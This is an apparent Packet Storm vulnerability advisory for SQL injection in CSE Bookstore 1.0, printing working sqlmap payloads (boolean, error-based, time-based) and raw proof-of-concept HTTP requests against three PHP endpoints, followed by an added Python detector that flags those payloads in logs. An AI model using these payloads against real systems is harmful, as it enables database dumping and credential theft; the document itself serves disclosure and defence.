
CSE Bookstore 1.0 SQL Injection

Published 22 Dec 2020. Reported by Musyoka Ian. Type: packetstorm. Source: packetstormsecurity.com

CSE Bookstore 1.0 SQL Injection vulnerability in multiple files

Code
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection  
# Date : 2020-12-21  
# Author : Musyoka Ian  
# Version : CSE Bookstore 1.0  
# Vendor Homepage: https://projectworlds.in/  
# Platform : PHP  
# Tested on : Debian  
  
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in the pubid parameter of bookPerPub.php. Successful exploitation of this vulnerability lets an attacker dump the entire database the web application is running on.  
  
Below are the results returned by SQLMap:  
  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT  
  
  
POC 1   
  
REQUEST  
========  
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1  
Host: 192.168.196.83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n  
Upgrade-Insecure-Requests: 1  
  
RESPONSE  
========  
  
HTTP/1.1 200 OK  
Date: Mon, 21 Dec 2020 20:09:49 GMT  
Server: Apache/2.4.38 (Debian)  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 172  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1  
  
POC 2  
The web application is also vulnerable to SQL injection in cart.php, via an injection payload in the bookisbn POST parameter.  
  
REQUEST  
=======  
  
POST /ebook/cart.php HTTP/1.1  
Host: 192.168.196.83  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 57  
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9  
  
  
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart  
  
RESPONSE  
=======  
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1  
  
POC 3  
Lastly, the bookisbn parameter of book.php is vulnerable to SQL injection. This also has a high severity, since it could lead to the dumping of database credentials.  
  
REQUEST  
=======  
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1  
Host: 192.168.196.83  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Referer: http://192.168.196.83/ebook/books.php  
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on  
  
RESPONSE  
========  
HTTP/1.1 200 OK  
Date: Mon, 21 Dec 2020 20:47:58 GMT  
Server: Apache/2.4.38 (Debian)  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 188  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1  
  
  
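As an added example (not part of the advisory or of the CSE Bookstore project), the check below recognises the three sqlmap technique classes listed above, and the raw-quote probes from the POCs, when they reach the affected endpoints. The access-log lines and client address are constructed; the allow-list shapes for pubid and bookisbn are assumptions about the application's intended input.

```python
# Added example (not from the advisory): flag the three injection techniques
# sqlmap reported above when they reach the affected endpoints.
import re
from urllib.parse import urlsplit, parse_qs

ISBN13 = re.compile(r"^\d{3}-\d{1,5}-\d{1,7}-\d{1,7}-\d$")  # assumed allow-list shape
SHAPES = {  # affected endpoint -> (vulnerable parameter, expected shape)
    "/ebook/bookPerPub.php": ("pubid", re.compile(r"^\d{1,10}$")),
    "/ebook/cart.php": ("bookisbn", ISBN13),
    "/ebook/book.php": ("bookisbn", ISBN13),
}
TECHNIQUES = [  # markers for the payload classes in the sqlmap output
    ("time-based blind", re.compile(r"sleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(or|and)\b\s+(not\s+)?\d+\s*=\s*\d+", re.I)),
]
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.*?) HTTP/[\d.]+"')

def classify(path, params):
    """(param, technique) when an affected parameter carries a bad value, else None."""
    if path not in SHAPES or SHAPES[path][0] not in params:
        return None
    name, shape = SHAPES[path]
    value = params[name][0]
    if shape.match(value):
        return None
    for label, marker in TECHNIQUES:
        if marker.search(value):
            return (name, label)
    return (name, "malformed value")  # e.g. the lone trailing quote in the POCs

def scan_form(path, body):
    """Check a raw POST body; access logs omit bodies, so feed app or WAF logs."""
    return classify(path, parse_qs(body))

def scan_log(lines):
    """[(index, param, technique)] for suspicious requests in access-log lines."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if m:
            target = urlsplit(m.group("target"))  # parse_qs percent-decodes values
            found = classify(target.path, parse_qs(target.query))
            if found:
                hits.append((i, *found))
    return hits

SAMPLE_LOG = [  # constructed: one benign request, then the POC-style values
    '10.0.0.5 - - [21/Dec/2020:20:09:00 +0000] "GET /ebook/bookPerPub.php?pubid=4 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Dec/2020:20:09:49 +0000] "GET /ebook/bookPerPub.php?pubid=4%27 HTTP/1.1" 200 172',
    '10.0.0.5 - - [21/Dec/2020:20:10:01 +0000] "GET /ebook/bookPerPub.php?pubid=%27%20OR%20NOT%204138%3D4138%23 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [21/Dec/2020:20:10:07 +0000] "GET /ebook/bookPerPub.php?pubid=%27%20AND%20(SELECT%206293%20FROM%20(SELECT(SLEEP(5)))eqTh)--%20CJmT HTTP/1.1" 200 172',
    '10.0.0.5 - - [21/Dec/2020:20:47:58 +0000] "GET /ebook/book.php?bookisbn=978-0-7303-1484-4%27 HTTP/1.1" 200 188',
]
```

Tune the shapes to the real data model before deploying; the technique markers are only a triage aid, and the fix that removes the bug is parameterised queries in the three PHP files.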
